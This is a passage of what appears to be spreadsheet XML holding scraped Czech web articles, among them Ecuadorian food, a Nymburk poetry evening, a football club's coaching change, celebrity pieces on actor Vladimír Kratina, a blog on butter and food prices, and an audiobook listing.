pasta, která se často podává na toustu k snídani nebo dokonce ve sladké variantě jako dezert. Ovšem k nejchutnějším dezertům, jaké jsem v Ekvádoru ochutnal, patří arroz con leche neboli rýžový pudink, který se připravuje z rýže, mléka, cukru a skořice, často podávaný s rozinkami nebo citronovou kůrou. Na ulicích Guayaquilu se setkáte s pestrou nabídkou mořských plodů. Například ekvádorské ceviche se trochu liší od peruánského – nejen v přípravě, ale i v použitých ingrediencích. Na rozdíl od peruánského ceviche, kde se čerstvé ryby marinují pouze v citronové šťávě, se v Ekvádoru často používá vařené nebo předem tepelně upravené maso. Tento pokrm je v Ekvádoru považován za ideální volbu pro horké dny. V Guayaquilu jsem si ceviche vychutnal v rušné turistické čtvrti Malecón 2000, kde z jednoho ze stánků hlasitě zněla skladba Manu Chaa „Guayaquil City“, oslovující jak sociální dichotomii, tak i palčivé vedro tohoto města. K chuťově výrazným pokrmům podávaným na ulici bych ještě přidal choclo con queso – vařené kukuřičné klasy se solí a kouskem čerstvého sýra, a věhlasnou polévku encebollado, která se připravuje z tuňáka, juky a červené cibule, která jí dodává charakteristický nádech. TasteAtlas dokonce v roce 2022 označil tuto polévku za druhou nejlepší na světě. Ačkoli sami Ekvádorci moc alkohol nepijí, doporučují tuto polévku jako ideální životabudič po kocovině. Pokud se zaměříme na absolutní fresh zážitek z mořských plodů, nadchla mě kombinace potápění a degustování v okolí ostrova Isla de la Plata. Místní instruktoři divingu rádi z oceánu vyloví mušle nebo mořské ježky, které lze hned ochutnat. Quito a Guayaquil V ekvádorských městech, jako je Quito , najdete mnoho vyhlášených restaurací, kde si můžete v pohodlném prostředí vychutnat autentickou kuchyni bez nutnosti sedět v přikrčené pozici jako u stánků agachaditos. Mezi nejuznávanější patří například Nuema, která se nachází v centru Quita a řadí se k nejlepším podnikům v zemi. Díky originálním ingrediencím a inovativnímu pojetí tradičních chutí se Nuema dostala mezi 50 nejlepších restaurací Latinské Ameriky podle několika prestižních žebříčků. Co v takové restauraci ochutnat? Mezi doporučené pokrmy patří například hornado de chancho – pečené vepřové servírované s rýží, avokádem a různými omáčkami, kde masu pomalé pečení dodává šťavnatost a bohatou chuť. Dalšími specialitami jsou langostinos gigantes con salsa de maracuya – velké grilované tygří krevety s omáčkou z maracuji, nebo pato al coco con salsa de tamarindo, což je kachna s kokosovou příchutí a tamarindovou omáčkou. Z jiných tradičních jídel je oblíbené i churrasco de alpaca con papas andinas – grilované maso alpaky podávané s andskými brambory (mimochodem o brambory není v Ekvádoru nouze – roste jich tu přibližně 350 druhů). Baňos Jediné, co mě trochu znepokojovalo v elitnějších restauracích, byl pocit sociálního kontrastu. Ne, že by v těchto restauracích nevařili výborně, jen trochu provokovala myšlenka, že za zdmi restaurace panuje jiná, méně honosná atmosféra. Nejvýrazněji jsem to cítil v Guayaquilu , nejkriminálnějším městě Ekvádoru , kde jsou sociální rozdíly opravdu zřetelné. Naopak v horském městečku Baños (1820 m n. m.) nejsou tyto rozdíly znát a městečko nabízí hojné spektrum lokální i mezinárodní kuchyně. Jméno „Baños“ se sice doslovně překládá jako „toaleta“ či „koupelna“, ale v tomto případě odkazuje na množství vodopádů a termálních pramenů v okolí. Jednou z tamních vizuálních specialit je i výhled na aktivní vulkán Tungurahua (5 023 m n. m.), jehož název se z jazyka quechua překládá jako “ohnivé hrdlo”. Některé podniky dokonce nabízejí koktejl tungurahua, který se skládá z rumu, limetkové šťávy, manga a zázvoru. Toto populární místo na pomezí And a amazonského pralesa je průsečíkem pro turisty, kteří po náročných trecích ocení trochu kulinářského hédonismu. Osobně mi nejvíc chutnala tamní pizza. Překvapilo mě, že městečko s obyvatelstvem okolo 15 tisíc lidí disponuje cca 20 podniky nabízejícími italské jídlo. K nejlépe hodnoceným restauracím například patří restaurace Leoni Pizzeria. Amazonská kuchyně Jednou z hlavních destinací pro výlet z městečka Baños je ekvádorská Amazonie. V oblastech jako Tena , Puyo nebo Macas narazíte na tradiční recepty, jako je maito de pescado nebo ayampaco. Tento pokrm patří mezi nejvýznamnější speciality východního Ekvádoru a zahrnuje ryby, zejména tilapie, grilované v listech bijao. Před samotným vařením se ryby důkladně čistí a dochucují směsí soli a různých koření. Během vaření listy uvolňují aroma, které dodává pokrmu charakteristickou kouřovou příchuť. Maito de pescado se obvykle podává s přílohami, jako jsou juka, banány, brambory a palmito, což je vnitřní část palmového stromu. Výbornou rybí polévku připravují indiáni Shuara. Jmenuje se caldo de corroncho neboli polévka z říční ryby corroncho, do které se přidá juka, banán, cibule, rajčata a koriandr. Mezi další populární recepty patří Guanta (Paka nížinná), což je typický hlodavec ekvádorské Amazonie , který žije v horské džungli a na březích řek. Toto zvíře se živí semeny, hlízami a ovocem, což mu ve výsledku dodává specifickou příchuť. A samozřejmě jsou v nabídce i grilované larvy brouků, kterým se říká chontacuros. Ve městech jako Tena a Puyo se tyto larvy grilují hned u autobusového nádraží. Co se týče lokálních nápojů, je populární te de guayusa – tradiční nápoj oblíbený domorodými komunitami. Pije se horký i studený, navíc obsahuje kofein a theobromin, což z něj činí energy drink. Dalším nápojem je chicha de chonta neboli chicha z plodů palmy chonta. Chonta je tradiční ovoce východního Ekvádoru a je populární zejména u kmenů Shuarů, Cofanů a Kichwas. Plody se vaří 30 minut a poté se oloupou a rozemelou na kameni, následně se umístí do nádoby, do které se přidá cukr a voda. Nakonec se vše nechá kvasit do druhého dne. Výsledkem je nápoj se silnou a výživnou chutí. Jak rezervovat letenky do Ekvádoru Nejlepší letenky kamkoliv najdete na našem letenkovém portálu Letuška.cz. Nebo nám napište poptávku s počtem cestujících a přibližnými termíny přes Kontaktní formulář. Inspirativní přehled nejlepších cen najdete na mapa.letuska.cz. Autor Autor: Autor | Letuška.cz Redakce | Napsat autorovi</t>
  </si>
  <si>
    <t>5650</t>
  </si>
  <si>
    <t>5780</t>
  </si>
  <si>
    <t>20241101_197_3244036326_931e48be0c813497c3ba.html</t>
  </si>
  <si>
    <t>931e48be0c813497c3ba</t>
  </si>
  <si>
    <t>Nymburská kavárna zve na večer plný poezie a hudby s Jiřím Imlaufem</t>
  </si>
  <si>
    <t>Nymburská kavárna zve na večer plný poezie a hudby s Jiřím Imlaufem Listopadový večer je jako stvořený pro podzimní melancholii – přesně to vás čeká v nymburské kavárně Café Society . V úterý 5. listopadu od 17:30 hodin bude hostem Jiří Imlauf , hudebník, básník a autor sbírek Zlatý časy se končí a Ústí hlavně. Jiří je známý nejen z kultovní kapely Houpací koně, ale také díky svým textům. Po rozpadu kapely se vydal na sólovou dráhu a vyměnil kytarový rock za akustický, intimnější zvuk. play_fill Nymbursko Není úplnou náhodou, že se večer ponese v literárně hudebním duchu. Tématem Dne poezie je totiž pro letošní rok „Na hrázi hudby“. Přijďte naslouchat příběhům a hudbě, která pohladí i pobídne k zamyšlení. Večer laděný do jemných tónů a osobní poetiky. Sklenka vína , dobrá hudba a příjemné prostředí Café Society vás vtáhnou do neopakovatelné atmosféry, která k podzimu jednoduše patří. Akce se koná v rámci festivalu Den poezie a vstupné je dobrovolné. Jan Červinka Autor: Čtenář reportér</t>
  </si>
  <si>
    <t>18400</t>
  </si>
  <si>
    <t>8189.999999999999</t>
  </si>
  <si>
    <t>20241101_198_3250233190_3e3ab30b26115bf79a6c.html</t>
  </si>
  <si>
    <t>3e3ab30b26115bf79a6c</t>
  </si>
  <si>
    <t>Tip na víkendový výlet. Památkové domky v Hluku</t>
  </si>
  <si>
    <t>Tip na víkendový výlet. Památkové domky v Hluku Další díl tipů na výlet nás zavede do městečka Hluk, které leží asi 10 km jihovýchodně od Uherského Hradiště . Jednou ze zdejších nejznámějších a nejzajímavějších památek je ulička se starobylým názvem Rajcovňa. Nachází se zde skupinka památkových domků, které formou skanzenu znázorňují způsob života a bydlení na vesnici v 18. a 19. století. Dnes si dokážeme jen těžko představit, že v jisbě o rozměrech 3 x 3 m mohla dříve bydlet až devítičlenná rodina. V současné době domky slouží jako místo, kde se setkávají všichni milovníci folkloru, ať už při akcích plánovaných, nebo jen tak u skleničky vína a s písničkou na rtu. Další díl Tipů na výlet nás zavede do městečka Hluk, které leží asi 10 km jihovýchodně od Uherského Hradiště . Jednou ze zdejších nejznámějších a nejzajímavějších památek je ulička se starobylým názvem Rajcovňa. Nachází se zde skupinka památkových domků, které formou skanzenu představují způsob života a bydlení na vesnici v 18. a 19. století. Věřili byste, že v jizbě o rozměrech 3x3 metry dříve bydlela až devítičlenná rodina? V současné době domky slouží jako místo, kde se setkávají všichni milovníci folklóru, ať už při akcích plánovaných, nebo jen tak – u skleničky vína a s písničkou na rtu. Pořad: Tipy na výlet</t>
  </si>
  <si>
    <t>20241101_199_3244078767_8f3d58a7b6b109b6358a.html</t>
  </si>
  <si>
    <t>8f3d58a7b6b109b6358a</t>
  </si>
  <si>
    <t>Havířov hledá trenéra, co exmanažer Baníku? Bugáň o Mrázkovi: Byl by odvolán</t>
  </si>
  <si>
    <t>Havířov hledá trenéra, co exmanažer Baníku ? Bugáň o Mrázkovi : Byl by odvolán Osobnost Deníku play_fill Havířov i přes poslední nezdary nadále vede tabulku divize. Od druhého Bílovce a třetích Vítkovic ho dělí pouze skóre, čtvrtá Polanka se zápasem k dobru ztrácí jen dva body. Pokud tedy zvládne dohrávku s Opavou B na konci listopadu, může jít do čela. Navíc Slezany oba prvně jmenovaní soupeři čekají. Vítkovice hostí už tuto neděli (10.15 hodin), za týden pocestují do Bílovce a podzim zakončí ve Frenštátu . Bugáň se však náročného programu nebojí. „Posledních pět šest zápasů jsme byli v lehké krizi, hodně to bylo o psychice. A když skončil trenér Mrázek , myslím si, že to týmu dodá impulz. Proto věřím, že ty zápasy zvládneme, protože máme silné a dobře poskládané mužstvo,“ prohlásil pro Deník. play_fill Fortuna divize Podle čeho soudí? „V pondělí na tréninku byli hráči smutní, hlavami jinde. Ve středu už ale vše bylo jinak, kluci se hecovali, snažili jsme se je dostat víc do pohody. A viděl jsem, jak se smějí, byli zase soutěživí, hráli o pivo , takže atmosféra v šatně se zvedla. Jak říkám, věřím, že změna bude impulz,“ zadoufal Pavol Bugáň. Ke změně by podle něj došlo bez ohledu na krok Tomáše Mrázka . „Myslím si, že kdyby neskončil, byl by asi během týdne odvolán,“ prozradil Bugáň. „ Havířov má nějaké cíle a poslední zápasy jim neodpovídaly. Ztráceli jsme body, které ztratil nešlo. Ať už s Novým Jičínem , s Polankou jsme měli smůlu, ale v Břidličné to opět bylo špatné a viselo to ve vzduchu. Možná to Tomáš tušil, že bude odvolaný, tak nás předběhl,“ poznamenal. „Víte, pracuje se snadno, když tým šlape, vyhráváme, všichni se smějí, ale lidé se ukážou ve chvíli, kdy přijde krize. A trenér především. Jak mužstvo namotivovat, nahecovat. Holt ve fotbale se hráči i trenéři mění, tohle není věc, která by nás limitovala. Opakuji, věřím, že tohle bude impulz k lepšímu,“ dodal šéf klubu. play_fill Kraje close info Zdroj: Deník/Vladimír Pryček zoom_in Nemanja Kuzmanovič . Ve zbytku podzimu tým povede dosavadní asistent Pavel Malcharek , vypomáhat mu bude kondiční kouč Radim Kozel. Mrázkův nástupce se hledá. „Musíme vše řešit s chladnou hlavou, nikoliv v emocích. Oslovil jsem trenéry ze Žiliny i z Ostravy , v hledáčku jich máme šest nebo sedm, ale jsou pod smlouvami, takže čekáme, až jim skončí, a začneme jednat. Je to o domluvě, ale nový trenér bude v Havířově určitě od 1. ledna,“ ujasnil. Ve fotbalovém prostředí se začalo nahlas mluvit o Aloisi Grussmannovi , který nedávno skončil v ostravském Baníku , a s nímž se Bugáň zná. „Ne, ten to určitě nebude,“ usmál se Bugáň. S průběhem sezony je spokojený. „Určitě není na místě panika,“ podotkl. „Vedeme tabulku, a že skončil trenér, je ve fotbale normální věc, protože on je většinou první na ráně. Podívejte se na Slovácko nebo Pardubice . Stejně tak je normální, že nikdo neprojde soutěží bez zaváhání. Ale když to zaváhání přijde, musíte umět reagovat a mužstvo zase nastartovat. Dostat ho do nějaké psychické pohody. To se teď nedařilo,“ zhodnotil Bugáň. Fortuna divize „Ale jsem rád, že tady Tomáš byl, věřím, že máme dobrý vztah a děkuji mu za odvedenou dobrou práci, ale chceme Havířov dostat do MSFL. Doufám, že to pomůže i jemu, že ho rok tady posunul, protože u nás dostal první šanci trénovat dospělý fotbal. Do té doby byl jen u mládeže. Do budoucna z něj může být dobrý trenér, třeba se naše cesty ještě někdy střetnou,“ uzavřel Pavol Bugáň. Autor: David Hekele Autor David Hekele</t>
  </si>
  <si>
    <t>8140.000000000001</t>
  </si>
  <si>
    <t>8910</t>
  </si>
  <si>
    <t>20241101_2_3342773502_1ca2b7c149fec210c086.html</t>
  </si>
  <si>
    <t>1ca2b7c149fec210c086</t>
  </si>
  <si>
    <t>FHS potřetí v Národní galerii</t>
  </si>
  <si>
    <t>FHS potřetí v Národní galerii 1. listopadu 2024 FHS potřetí v Národní galerii . Začíná cyklus přednášek Umění ve filozofické zpovědnici Od hvězdné samoty ke kráse lidí barev neboli šestero setkání o prolínání filozofie, umění a vědy Co má obraz společného se šesti pivy , v čem jsou pavučiny podobné vesmírným mlhovinám a jak se nám může mstít příroda? Národní galerie ve spolupráci s Fakultou humanitních studií Univerzity Karlovy nabízí už třetí pokračování jedinečného cyklu mezioborových komentovaných prohlídek. Filozofové*ky prostřednictvím dialogu s kurátory*kami a edukátory*kami nechají „vyprávět“ vybrané obrazy a sochy, které samy za sebe promluvit nemohou. Každé z takto „polichocených“ děl se zároveň stane východiskem pro zamyšlení nad aktuálními problémy; tentokrát se zaměříme na poválečné a současné umění: co nám mohou domněle nesrozumitelná díla při filozofickém výslechu prozradit o světě, který si sám nerozumí? Celý program naleznete zde. Studenti FHS mají vstup zdarma! Zájemci nechť se přihlásí skrze adresu vyzva@fhs.cuni.cz. Sdílet na: 182 00 Praha 8 - Libeň Identifikátor datové schránky: piyj9b4</t>
  </si>
  <si>
    <t>126530</t>
  </si>
  <si>
    <t>102440</t>
  </si>
  <si>
    <t>20241101_20_3264615117_e959ef78a7420709e3dd.html</t>
  </si>
  <si>
    <t>e959ef78a7420709e3dd</t>
  </si>
  <si>
    <t>Herec Kratina svou Jitku miluje až za hrob. Podívejte, jak krásná žena dobyla srdce samotářského mládence</t>
  </si>
  <si>
    <t>Herec Kratina svou Jitku miluje až za hrob. Podívejte, jak krásná žena dobyla srdce samotářského mládence close + 8 fotografií Herec Vladimír Kratina si prošel velmi ošklivým rozvodem a na ženy proto na dluhá léta zanevřel. Z jeho staromládeneckého života ho vysvobodila až jeho současná manželka Jitka. Již během studií poznal Vladimír Kratina loutkoherečku Šimonu Součkovou, se kterou se po dokončení školy také oženil. Dvojici se poté narodila dcera Marie, jejich soužití ale nebylo příliš šťastné. Šimona nakonec svého muže i s dcerou opustila. To ale nebylo to nejhorší, co mělo přijít. Krátce po rozvodu si totiž hercova exmanželka našla nového partnera a i s malou Maruškou emigrovali do Francie . Vzhledem k tomu, jak se minulý režim stavěl k těm, kdo opustili vlast a vydali se do ciziny, poté Vladimír Kratina dceru neviděl deset let. „Přiznám se, že jsem přemýšlel i tom, že bych také emigroval, abych mohl být s ní. Také si ale vybavuji moment, kvůli němuž jsem se nakonec rozhodl zůstat doma. Byli jsme s divadlem na zájezdě v Západním Německu a po představení zašli na pivo . Když jsem se pak vracel tím cizím městem zpátky na hotel, díval jsem se do oken, která jedno po druhém postupně zhasínala. V tom jsem si řekl: ‚Ty vole, až ráno kolegové odjedou, co tady budeš dělat? Vždyť tu nebudeš mít jediného kamaráda.‘ A to rozhodlo,” popsal po letech pro web Prima Ženy. Po rozvodu na ženy zanevřel Po tomto zklamání se poměrně dlouhou dobu do nového vztahu Vladimír Kratina nehrnul. Žil sám, užíval si staromládenecký život a světské radovánky. „Nebyla to úplně špatná doba. Pochopitelně jsem měl nějaký vztahy, ale naučil sem se, že to okřídlený „sám si vařím, sám si peru, že se na to nevys*ru“, neplatí. Odboural jsem to, klidně vařím, a kdybych se soustředil, tak si i vyperu a vyžehlím. Takže jsem se stal naprosto soběstačným," zavzpomínal herec na období, kdy byl single, pro web Proženy.cz. Před samotou ho nakonec zachránilo to, že potkal zdravotní sestřičku Jitku, do které se zamiloval. Jejich vztah se vyvíjel, až nakonec dospěl k veselce. Manželka mu dala další dvě dcery V roce 1992 vstoupil herec do chomoutu podruhé a tentokrát měl ve volbě manželky šťastnější ruku, protože spolu žijí dodnes. Narodily se mu poté další dvě dcery, Dominika a Sofie. Že se ani napotřetí nedočkal mužského potomka, ho prý vůbec netrápí. „Nejsem mužský šovinista. Vždycky jsem si přál jediné, aby holky byly zdravé a aby z nich nebyly pecky. A to se naštěstí vždycky splnilo,” přiznal pyšný otec. K rodičovství mají ale s manželkou každý trochu jiný přístup, což mezi nimi v minulosti vyvolávalo drobné třenice. Na výchově se s manželkou občas neshodli „Moje milovaná má tendenci vyžadovat autoritu z pozice matky, kdežto já jsem se v odborný literatuře dočetl, že osobnost člověka se vytváří hlavně v prenatální fázi a do tří let života, pak už se to jenom dolaďuje. Čili já jsem přistupoval k výchově tak, že od tří let už jsem jenom sledoval, co tam teda je uloženo, a jenom to lehce korigoval," vysvětlil Vladimír Kratina . Na své dcery je herec nyní velmi pyšný. Kromě toho přiznal, že často se v nich doslova vidí a uvědomuje si, co vše mají společného. „Hlavně je mám moc rád, jsou bezvadný. Asi jako všichni jsou napůl namíchané. Když si třeba jedna dcera stěžuje, že maminka je hrozná, neuvědomuje si, že se chová mnohdy jako ona. Myslím, že se ukazuje, že ta moje metoda taky měla svoje opodstatnění: uvědomují si, že v životě je důležitý být tolerantní a zachovávat klid. Nevyvádět a nemyslet si, že pravda je jenom jedna," svěřil se sympatický umělec. Rubrika transition_slide Magazín</t>
  </si>
  <si>
    <t>335890</t>
  </si>
  <si>
    <t>20241101_200_3309125971_3e8e53be25c1a80db96d.html</t>
  </si>
  <si>
    <t>3e8e53be25c1a80db96d</t>
  </si>
  <si>
    <t>Co se děje s cenami potravin?</t>
  </si>
  <si>
    <t>Co se děje s cenami potravin? 1.11.2024 13:27 Oficiální Inflace se drží u dvou procent, ale ceny potravin skáčou klidně skoro na dvojnásobek. Připomíná to údiv pana profesora matematiky, který po letech potká svého blbého žáka, jak vystupuje z mercedesu. Čím se živíte? Inu, obchodem. Koupím za sto, prodám za dvě stě. To jedno procento mi stačí. Luxusní potravina na pět? Tahle křížovka si jasně říká o máslo, oprávněně bědují autorky na portálu Proženy.cz. Klidně stojí i 70 korun za kostku, čili 280 korun za kilo. To je zhruba spotřeba za vánoční sadu cukroví pro rodinu s odrůstajícími žrouty všeho, co je po ruce. Všude se citují tvrzení výrobců, že na letošní vysoké ceně se podepsala hlavně příroda. Tedy že – jak říká Jiří Kopáček, předseda Českomoravského svazu mlékárenského – v létě bylo horko, a tak krávy dávaly méně mléka a k tomu s nižší tučností. A lidi dávají tomu tučnějšímu mléku, jogurtům i sýrům stále častěji přednost. Je to tedy kombinace nedostatku produkce a nadbytku poptávky. Jenže cenové skoky potravin nejsou specialitou jen jednoho roku. Jistě je tedy někde k dispozici i pestřejší výběr vysvětlení. Dlouhodobý vývoj cen potravin můžeme sledovat na stránkách Českého statistického úřadu, který navíc umožňuje sestavovat cenové grafy položek podle vlastního výběru. https://csu.gov.cz/vyvoj-prumernych-cen-vybranych-potravin-2024 Graf č. 1: Ceny másla Jinou věcí je, že nevíme, jaký je rozdíl mezi cenami, za které dodávají mlékárny řetězcům a cenami na pultech pro spotřebitele. Tohle taky kolovalo všude: Někdy se mluví o nárůstu cen mléka přímo od chovatelů. „Ti ale mají na ceny mléka, za které sami prodávají, jen omezený vliv. Cena tuzemského mléka se dlouhodobě pohybuje pod evropským průměrem, české mléko přitom dosahuje v mezinárodním srovnání špičkových výsledků. Vliv na cenu mají i jeho obsahové složky – tuk nebo bílkoviny, kterých bývá v létě méně,“ říká tisková mluvčí Agrární komory České republiky Barbora Pánková a doplňuje: „Ze statistik vyplývá, že v období od letošního ledna do září dodali chovatelé do tuzemských mlékáren více mléka než za stejné období loni a vyrobilo se také více tuku, který je pro produkci másla zásadní. Z toho je jasné, že zemědělci za aktuálně drahé máslo skutečně nemohou .“ Každý tak tvrdí něco jiného. Ve hře je také navyšování marží obchodníků , což uvedl i mluvčí Potravinářské komory Marek Zemánek: „Producenti v září zvedli cenu másla v průměru o 15,8 koruny za kilogram kvůli nedostatku mléčného tuku na trhu, rostoucí výkupní ceně mléka a také ceně práce. Obchodní řetězce ovšem, na rozdíl od výrobců, z měsíce na měsíc navýšily u másla svou obchodní přirážku, která po odečtení DPH vychází na 26,93 koruny za kilogram.“ Toto prohlášení ale okamžitě odmítl prezident Svazu obchodu a cestovního ruchu ČR Tomáš Prouza, který argumentoval tím, že marže obchodníků na čtvrtce másla je po odečtení DPH kolem 2,30 Kč. https://www.prozeny.cz/clanek/radce-proc-je-maslo-tak-drahe-96627 Co jsme se tedy dozvěděli? Mléka bylo méně a vyrobilo se méně tuku a současně mléka bylo více a vyrobilo se i více tuku. Marže obchodníků prudce vzrostly a současně jsou minimální. Tak dobře, ukažte nám faktury! „Je třeba si odkrýt karty, jenže to nikdo neudělá. Ať přijdou ze supermarketů a ať všichni řeknou, za kolik nakupují. To na faktuře za poslední měsíce přece je, je tam uvedeno, kolik za tučné nebo polotučné mléko. Tak ať to lidem ukážou. Ať zpracovatel nebo potravinář řekne, za kolik to koupil od prvovýrobce, zemědělce, a je to vyřešeno,“ horuje Jaroslav Šíma , předseda představenstva Osecké zemědělské a.s. „Ovšem jako by hrách na stěnu házel nebo mluvil do dubu. K tomu se nikdy – opakuji nikdy – nedostaneme! To mají všichni mezi sebou zakázáno říkat. Nejdřív se plká, že markety mají dvě koruny na provizích, jak říká Prouza, což je absolutní, kolosální nesmysl. Takže důkazy v podobě faktur nemáme. A nikdo to neotevře. Ovšem, bude se o tom neustále povídat,“ nebere si servítky Šíma . https://www.parlamentnilisty.cz/arena/rozhovory/-Ukazat-lidem-faktury-to-maji-zakazano-Pravda-o-drahem-masle-primo-z-branze-764116 Jiné ceny potravin byly dlouho stálejší, tedy stoupaly pozvolněji. V posledním období však taky zažily cenový skok. Můžeme v tom hledat energetickou krizi, která postihla prvovýrobce, zpracovatele i chladící boxy distributorů. Horní linii následujícího grafu představuje hovězí maso, ze kterého šlo ustoupit třeba do smažáku z eidamského sýra (zelená linie), který byl jednu chvíli stejně drahý jako vepřové (spodní linie). Na tom vepřovém je přitom vidět i prasečí cyklus, jak se říká vlivu poptávky. Lidi kupují míň, cena klesá a sníží se chovy. Pak poptávka vzroste, ale chovy se obnovují pomaleji, a ten rozdíl tlačí cenu vzhůru. Graf č. 2: Ceny hovězího, sýra a vepřového Podobný cyklus mají i brambory, které jsou i v těch výkyvech dlouhodobé docela stabilní. Prudce ale vzrostly ceny chleba a trochu ožilo i pivo . Když si však jeho ceny dělíte deseti, abyste se přes palec dostali ke srovnání s cenovou hladinou za totáče, je pořád výrazně levnější než tenkrát. Drahé jsou jen velké pivovary, které mají velkou vyjednávací sílu, a levné jsou ty menší, přestože jejich pivo je často mnohem lepší. Graf č. 3: Ceny chleba, brambor a piva Otázka, kdo může za růst cen, tedy zůstává. Před čtyřmi lety se to pokoušela zachytit Česká národní banka a dospěla k názoru, že každý si bere zhruba stejně čili, když cena roste, dostanou víc prvovýrobci, zpracovatelé i distribuce. Vidíme to na grafu ze zprávy o inflaci ze začátku roku 2020, kdy do toho možná bylo lépe vidět – nebo kdy zdroje úspěšně lhaly. Graf č. 4: Podíly na cenách potravin https://www.cnb.cz/cs/menova-politika/zpravy-o-inflaci/tematicke-prilohy-a-boxy/Co-hybe-cenami-potravin Dal bych přednost starší studii autorů Pokorný, Seják, Dejmal, která šla do hloubky a zjistila, že největší podíl ze zisku v potravinářství spolknou distributoři, zatímco zpracovatelé jsou skromnější a prvovýrobci jsou bráni u huby. Aby si nestlali v rakvi, protože do rána stejně nevydrží, dostávají evropské dotace. Ty jsou zhruba stejně velké jako to, co spolknou distributoři. Takže jde o dotace distributorům. Tak vypadá pravda tak holá, že ji na veřejnosti raději zakrýváme. Autor: zbynek-fiala Rubrika transition_slide Blogy</t>
  </si>
  <si>
    <t>5360</t>
  </si>
  <si>
    <t>3100</t>
  </si>
  <si>
    <t>20241101_201_3244162397_1a84f67f65fec748a178.html</t>
  </si>
  <si>
    <t>1a84f67f65fec748a178</t>
  </si>
  <si>
    <t>Podívejte, jak neskutečně krásné má dcery Vladimír Kratina? Starší odloudila partnera bývalé České Miss</t>
  </si>
  <si>
    <t>Podívejte, jak neskutečně krásné má dcery Vladimír Kratina ? Starší odloudila partnera bývalé České Miss close + 4 fotografie Známe ho jako Drtikola z oblíbeného filmu Prázdniny pod psa. Herec Vladimír Kratina má za sebou velmi bouřlivá období, ať už se to týká nejen jeho profese, ale také vztahů. Jeho první žena s dcerou ho opustila, naštěstí má další dvě, které mu dělají radost dodnes. A jsou krásné jako obrázek. Když v Československu panoval ještě minulý režim, byl to právě Vladimír Kratina , který platil za jednoho z nejvyhledávanějších herců. Ostatně není se čemu divit, byl velmi pohledný, švihák lázeňský a charisma mu také nechybělo. Milovalo ho hlavně ženské publikum u televizních obrazovek a s tím se samozřejmě nesla značná popularita a s popularitou zase velmi vysoké sebevědomí. A právě na to jednoho dne Kratina doplatil. Tedy alespoň tuto verzi příběhu interpretují některá média, později si řekneme, co k tomu uvedl samotný aktér celé záležitosti. Tehdy se mělo stát to, že Kratina se svým spolužákem hojně popíjeli v jedné vinárně a posléze posíleni alkoholem strhnout vlajku Sovětského svazu z divadelního studia DAMU . Posléze ho policisté odvezli na Ruzyň za hanobení. Hanobení Sovětského svazu Herec k tomu říká toto: „To je nepřesný. Nebylo to hanobení, protože vyloženě o vlajku nešlo. Se spolužákem jsme seděli v Makarské vinárně, vypili jsme dost chorvatského červeného vína a šli jsme na kolej v Hradební ulici. Bylo to kolem 8. května 1971, šli jsme kolem našeho školního divadla Disk, na zemi ležela rudá vlajka, která spadla z výzdoby.” Kratina pokračuje s tím, že jeho spolužák se pak vydal jiným směrem a on šel dál sám, s vlajkou v ruce. „A když jelo policejní auto, zahodil jsem ji. Oni mě viděli, zastavili, vzali vlajku a mě. Dali mě do separace, byly svátky, tak jsem tam s dalšími třiceti lidmi tvrdl tři dny. Prokurátorka mi dala paragraf 202 výtržnictví, na to bylo osmnáct měsíců v kriminále,” popsal dávný nemilý zážitek herec. Pobyt ve vězení byl pro Kratinu peklem na zemi, ale naštěstí se díky svému profesorovi Otovi Skleničkovi dostal na svobodu dříve. Na svobodu ho pustil Ludvík Svoboda , tehdejší prezident, který nešťastnému mladíkovi udělil milost. Mohl dál hrát, i když byl ve vězení Jeden by čekal, že za takový počin se už v televizi ani divadle neukáže, ale stal se velký zázrak. Asi i samotní soudruzi si uvědomili, co je to za výjimečného člověka, a tak Kratina mohl naskočit zpět do jeho dobře rozjetého hereckého vlaku. Jeho první velkou láskou se stala loutkoherečka Šimona Součková. Dokonce došlo i na svatbu a manželům se narodila dcerka Marie. Bohužel vztah nefungoval, a tak přišel rozvod, co více, Součková se znovu zamilovala a za novým vztahem emigrovala do Francie , kam odvezla i jejich společnou dcerku. Kratina samozřejmě z očividných důvodů do země galského kohouta nemohl, a tak se s Marií nevídal. Co víme, je to, že z něj Marie udělala dědečka, když se jí narodil syn. gallery 6 video Co se týká žen, o ty ale rozhodně nouzi neměl. Čerstvě nabytá svoboda vehnala bouřlivákovi Kratinovi vítr do vlasů a jeho vlající lokny okouzlily například Zoru Jandovou nebo Marthu Elefteriadu . Pak ale potkal zdravotní sestřičku Jitku a zase byla ruka v rukávě. Svatba proběhla v roce 1992 a mají dvě krásné dcery. Rozvod kam se podíváš Mladší se jmenuje Sofie a starší Dominika. A byla to právě Dominika, která se před nějakou dobou tak trochu nešťastně proslavila. Byla to totiž ona, kdo stál za krachem manželství někdejší účastnice Miss a moderátorky TV Nova Ivety Lutovské a podnikatele Jaroslva Víta. Vášeň mezi Vítem a Kratinovou však byla silnější, že neunikla ani papparazzi v Peci pod Sněžkou , kde je nachytali in flagranti. A skandál byl na světě. Dominika se zkrátka skutečně potatila, je vidět, že její láska hory přenáší, a to i Sněžku, která je nevyšší v Česku. Ona sama se totiž v roce 2018 provdala za Jiřího Pokorného, se kterým má syna Tobiase. Jak vypadají dcery Vladimíra Kratiny se můžete podívat v naší galerii. Rubrika transition_slide Magazín</t>
  </si>
  <si>
    <t>20241101_202_3244077076_4860779dcd7c7475c697.html</t>
  </si>
  <si>
    <t>4860779dcd7c7475c697</t>
  </si>
  <si>
    <t>Audiokniha Jiří Brdečka: Limonádový Joe</t>
  </si>
  <si>
    <t>Audiokniha Jiří Brdečka : Limonádový Joe Humoristický román z roku 1946 o pistolníkovi z Divokého západu, který pije pouze Catlettovu limonádu, pomáhá utlačovaným a bojuje proti zlu a neřestem. Knižní předloha se od pozdějšího slavného filmu v mnohém liší, některé známé postavy mají jiné jméno, mnohé se ve filmu ani ne objevily. Jiří Brdečka : Limonádový Joe CR 1245-2, EAN 8 590236 124523, CDmp3 329 Kč, Radiokarta 309 Kč 12 částí, celkový čas 5 hodin 19 minut Čte: David Novotný Režie Dimitrij Dudík Limonádový Joe Velký úspěch se dnes dá odhadnout předem, ale trvalý úspěch je vždycky záhada. Limonádovému Joeovi je letos 84 let a nepřestává bavit ve filmové, divadelní i literární podobě. Jak je to možné? Vznikl náhodou, a kdyby nebylo německé okupace, nemusel se narodit vůbec. Když Němci zavřeli roku 1939 vysoké školy, živil se můj otec Jiří Brdečka v Praze kreslenými vtipy a povídkami pro časopis Ahoj na neděli, který spadal pod vydavatelství Melantrich . Útočiště tu našlo mnoho autorů a redaktorů a všichni každý týden uvažovali, co zábavného nabídnout čtenářům, aby to zároveň nevzbudilo podezření okupačních cenzorů. A tak začal ve druhém roce války 